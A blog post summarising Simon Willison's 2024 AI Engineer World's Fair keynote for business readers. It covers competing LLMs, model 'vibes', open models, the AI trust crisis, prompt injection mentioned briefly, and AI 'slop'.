The AI Landscape: Middle Half Of 2024
As I wrote in my previous post, I follow Simon Willison closely because he is one of the most knowledgeable people working in the realm of Large Language Models (LLMs) and AI.
Most importantly, Simon actually works and tests the LLMs. He doesn't talk about how much more billions of dollars of growth the market for AI is this week or if AI will be the downfall of humankind. In the words of Paul Everett, Simon gets the story straight. I am also biased since Simon is also a member of our Python community.
So it was with great interest that I read his blog post on his keynote for the AI Engineer World’s Fair. It's a long post and is packed with his views on the breakthroughs and challenges that are currently happening in the LLMs and AI space, so I've distilled and tried to summarize for my readers, who are mostly in business-related roles and less technically inclined than my other peers.
You Have Other Than GPT-4 Now
When OpenAI released GPT-4 on March 14, 2023, it quickly became the gold standard for language models, dominating the field for nearly a year. However, this dominance raised concerns about a monopoly in AI model quality. For almost a year, no other model could rival GPT-4's performance, leading to fears of stagnation and a lack of competition. But the landscape has changed dramatically in the past few months. New models have emerged, breaking the GPT-4 barrier and ushering in a new era of competition and innovation.
The New Landscape of Models
Today, we see three distinct clusters of models:
- The top-tier models, including GPT-4o, Claude 3.5 Sonnet, and Google Gemini 1.5 Pro, offer cutting-edge performance at competitive prices.
- Meanwhile, more affordable yet highly capable models like Claude 3 Haiku and Google Gemini 1.5 Flash provide viable alternatives for budget-conscious projects.
- However, models like GPT-3.5 Turbo have become obsolete, highlighting the rapid pace of technological advancement.
Simon was pretty specific in his talk to tell us NOT TO USE GPT-3.5 Turbo anymore. In his own words, it's "hot garbage" (I have never seen hot garbage before. Have you?)
Evaluating Model Vibes
Having a bunch of new models to try out is fun and good, but how do you know which one is the best?
"Vibes" is a term Simon frequently uses when he wants to evaluate LLMs.
Performance metrics alone do not paint the full picture. The "vibes" of a model, or how well it aligns with the intended tasks, are equally important. Simon highlighted the LMSYS Chatbot Arena, a platform where users can compare models based on their "vibes" through head-to-head prompts. This user-driven evaluation method has proven invaluable in determining the practical usability of different models, with GPT-4o and Claude 3.5 Sonnet currently leading the pack.
The Rise of Open Licensed And Free To Access Models
Openly licensed models are making significant strides, with new entrants like Llama 3 and Cohere/NVIDIA's Command R+ offering impressive capabilities. These models democratize access to high-quality AI, allowing more developers to experiment and innovate without the constraints of proprietary systems. This shift is fostering a more diverse and competitive AI ecosystem.
Free Access to GPT-4 Class Models
One of the most exciting developments is the availability of GPT-4 class models for free. Both GPT-4o and Claude 3.5 Sonnet are now accessible to consumers without cost, provided they sign in. This democratization of cutting-edge AI technology allows a broader audience to experience and leverage the power of these advanced models.
Challenges in Using AI Tools
Despite these advancements, using AI tools effectively remains a complex task. Simon emphasized the challenges associated with tools like ChatGPT, particularly when dealing with diverse inputs like PDFs. The intricacies of processing and interpreting different types of data highlight the need for advanced technical skills and experience to unlock the full potential of these tools.
The "AI Trust Crisis"
Trust is a significant issue in the AI industry. Recent incidents involving Dropbox and Slack have exacerbated user concerns about data privacy and AI usage. Misleading communication and poor design have led to widespread distrust, even when companies like Anthropic explicitly state they do not use customer data for training. Rebuilding trust will require transparency, clear communication, and robust privacy practices.
The Persistent Threat of Prompt Injection
Prompt injection remains a critical vulnerability in AI systems. Simon's talk underscored the ongoing challenges posed by this issue, with examples like the Markdown image exfiltration bug demonstrating the potential for data breaches. Understanding and mitigating prompt injection is crucial for maintaining the security and integrity of AI applications.
Avoiding the Slop of AI Content
You know what "spam" is right? Well, we now have "slop"
Simon introduced the concept of "slop"—AI-generated content that is both unrequested and unreviewed. Publishing such content can harm the credibility of AI systems and the individuals or organizations behind them. AI engineers must take accountability for the content they produce, ensuring it is accurate, reliable, and valuable.
We've made it a point for our product Kafkai to have an editorial step and not to have an auto-publish functionality even though there are customers who want it.
Our Responsibilities as AI Engineers
Finally, Simon left a message at the end of his keynote: As AI engineers, we are at the forefront of this technological revolution. It is our responsibility to establish best practices for using AI tools responsibly and to guide others in understanding their capabilities and limitations. By setting a positive example and sharing our knowledge, we can help ensure that AI technology is used to benefit society as a whole.
Simon Willison's keynote provides a comprehensive overview of the current state of AI and the challenges that lie ahead. As we navigate this exciting yet complex landscape, it is crucial to remain vigilant, responsible, and innovative.